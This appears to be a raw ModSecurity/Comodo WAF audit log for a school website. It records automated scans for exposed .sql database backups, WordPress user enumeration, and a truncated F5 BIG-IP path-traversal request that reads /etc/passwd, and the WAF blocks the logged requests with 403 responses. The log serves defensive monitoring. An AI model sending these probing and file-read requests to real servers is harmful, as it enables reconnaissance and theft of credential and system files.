[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957079603607 2242 (- - -) Stopwatch2: 1748957079603607 2242; combined=813, p1=364, p2=425, p3=0, p4=0, p5=23, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43d0b25c-Z-- --5a96e152-A-- [03/Jun/2025:20:24:40 +0700] aD73mESujXvW2xVCZlUPIAAAAAs 103.236.140.4 38518 103.236.140.4 8181 --5a96e152-B-- GET /wp_users.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.26 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --5a96e152-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5a96e152-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957080380282 2297 (- - -) Stopwatch2: 1748957080380282 2297; combined=888, p1=388, p2=405, p3=0, p4=0, p5=95, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5a96e152-Z-- --195bd771-A-- [03/Jun/2025:20:24:40 +0700] aD73mESujXvW2xVCZlUPIQAAAA8 103.236.140.4 38524 103.236.140.4 8181 --195bd771-B-- GET /wp_user.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.26 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --195bd771-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --195bd771-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957080937775 2538 (- - -) Stopwatch2: 1748957080937775 2538; combined=913, p1=452, p2=432, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --195bd771-Z-- --b781ab42-A-- [03/Jun/2025:20:24:41 +0700] aD73mUSujXvW2xVCZlUPJQAAAAo 103.236.140.4 38538 103.236.140.4 8181 --b781ab42-B-- GET /wordpress1.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.26 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --b781ab42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b781ab42-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957081610672 3960 (- - -) Stopwatch2: 1748957081610672 3960; combined=1396, p1=733, p2=619, p3=0, p4=0, p5=44, sr=164, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b781ab42-Z-- --18a86b41-A-- [03/Jun/2025:20:24:43 +0700] aD73m5AN5Lj366RdGMz9bQAAAM0 103.236.140.4 38560 103.236.140.4 8181 --18a86b41-B-- GET /blog.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.26 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.26 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --18a86b41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --18a86b41-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957083221513 2246 (- - -) Stopwatch2: 1748957083221513 2246; combined=703, p1=333, p2=347, p3=0, p4=0, p5=23, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18a86b41-Z-- --45ccb80a-A-- [03/Jun/2025:20:24:44 +0700] aD73nJAN5Lj366RdGMz9bwAAAMg 103.236.140.4 38578 103.236.140.4 8181 --45ccb80a-B-- GET /wp1.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.84.107.47 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.84.107.47 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --45ccb80a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45ccb80a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957084475626 2549 (- - -) Stopwatch2: 1748957084475626 2549; combined=793, p1=392, p2=373, p3=0, p4=0, p5=28, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45ccb80a-Z-- --43d1a770-A-- [03/Jun/2025:20:24:46 +0700] aD73no0G58RZMmoh8H0opAAAAIQ 103.236.140.4 38604 103.236.140.4 8181 --43d1a770-B-- GET /wp2.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.239.232.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.239.232.102 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --43d1a770-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43d1a770-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957086317344 2480 (- - -) Stopwatch2: 1748957086317344 2480; combined=863, p1=418, p2=418, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43d1a770-Z-- --f467d206-A-- [03/Jun/2025:20:24:47 +0700] aD73nwhM7ynDNybXsoPiwwAAAFg 103.236.140.4 38622 103.236.140.4 8181 --f467d206-B-- GET /wp3.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.239.232.102 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.239.232.102 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --f467d206-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f467d206-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957087545082 2507 (- - -) Stopwatch2: 1748957087545082 2507; combined=915, p1=455, p2=430, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f467d206-Z-- --b269e828-A-- [03/Jun/2025:20:24:50 +0700] aD73oo0G58RZMmoh8H0oqgAAAJA 103.236.140.4 38664 103.236.140.4 8181 --b269e828-B-- GET /baza.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.40.4.132 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.40.4.132 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --b269e828-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b269e828-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957090964687 2422 (- - -) Stopwatch2: 1748957090964687 2422; combined=1011, p1=471, p2=505, p3=0, p4=0, p5=35, sr=127, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b269e828-Z-- --2a7a1e14-A-- [03/Jun/2025:20:24:52 +0700] aD73pI0G58RZMmoh8H0orAAAAIU 103.236.140.4 38686 103.236.140.4 8181 --2a7a1e14-B-- GET /wp_4.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.166 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --2a7a1e14-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a7a1e14-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957092422517 2501 (- - -) Stopwatch2: 1748957092422517 2501; combined=914, p1=432, p2=454, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a7a1e14-Z-- --0ce99f20-A-- [03/Jun/2025:20:24:54 +0700] aD73ppAN5Lj366RdGMz9dAAAANU 103.236.140.4 38708 103.236.140.4 8181 --0ce99f20-B-- GET /wp3.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.166 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --0ce99f20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0ce99f20-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957094013944 3638 (- - -) Stopwatch2: 1748957094013944 3638; combined=1047, p1=504, p2=443, p3=0, p4=0, p5=100, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0ce99f20-Z-- --5b71cc4c-A-- [03/Jun/2025:20:24:55 +0700] aD73p5AN5Lj366RdGMz9dQAAANQ 103.236.140.4 38734 103.236.140.4 8181 --5b71cc4c-B-- GET /wordpress_8.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --5b71cc4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5b71cc4c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957095786973 2631 (- - -) Stopwatch2: 1748957095786973 2631; combined=946, p1=451, p2=467, p3=0, p4=0, p5=28, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5b71cc4c-Z-- --32c66d3a-A-- [03/Jun/2025:20:24:56 +0700] aD73qESujXvW2xVCZlUPPgAAABA 103.236.140.4 38744 103.236.140.4 8181 --32c66d3a-B-- GET /blogdb.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --32c66d3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --32c66d3a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957096434775 2483 (- - -) Stopwatch2: 1748957096434775 2483; combined=893, p1=434, p2=431, p3=0, p4=0, p5=28, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32c66d3a-Z-- --897bd366-A-- [03/Jun/2025:20:24:57 +0700] aD73qUSujXvW2xVCZlUPQAAAAAM 103.236.140.4 38754 103.236.140.4 8181 --897bd366-B-- GET /wordpress2.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --897bd366-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --897bd366-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957097129310 2533 (- - -) Stopwatch2: 1748957097129310 2533; combined=952, p1=425, p2=498, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --897bd366-Z-- --48383502-A-- [03/Jun/2025:20:24:57 +0700] aD73qUSujXvW2xVCZlUPQwAAAA0 103.236.140.4 38764 103.236.140.4 8181 --48383502-B-- GET /nova.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --48383502-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48383502-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957097695966 2502 (- - -) Stopwatch2: 1748957097695966 2502; combined=889, p1=460, p2=404, p3=0, p4=0, p5=25, sr=128, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48383502-Z-- --6cc6e52b-A-- [03/Jun/2025:20:24:58 +0700] aD73qpAN5Lj366RdGMz9dgAAAMU 103.236.140.4 38774 103.236.140.4 8181 --6cc6e52b-B-- GET /dbwordpress.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --6cc6e52b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cc6e52b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957098257964 2094 (- - -) Stopwatch2: 1748957098257964 2094; combined=977, p1=432, p2=515, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6cc6e52b-Z-- --a7cc4d05-A-- [03/Jun/2025:20:24:58 +0700] aD73qpAN5Lj366RdGMz9dwAAAME 103.236.140.4 38780 103.236.140.4 8181 --a7cc4d05-B-- GET /wp_prod.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.19 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --a7cc4d05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a7cc4d05-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748957098831582 2491 (- - -) Stopwatch2: 1748957098831582 2491; combined=905, p1=422, p2=453, p3=0, p4=0, p5=29, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7cc4d05-Z-- --c019a313-A-- [03/Jun/2025:20:40:31 +0700] aD77T40G58RZMmoh8H0qxAAAAIw 103.236.140.4 50544 103.236.140.4 8181 --c019a313-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 156.239.195.78 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.239.195.78 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --c019a313-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c019a313-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748958031776880 3125 (- - -) Stopwatch2: 1748958031776880 3125; combined=1460, p1=468, p2=959, p3=0, p4=0, p5=33, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c019a313-Z-- --6d5e8b61-A-- [03/Jun/2025:20:43:12 +0700] aD778AhM7ynDNybXsoPmsgAAAEg 103.236.140.4 52568 103.236.140.4 8181 --6d5e8b61-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: 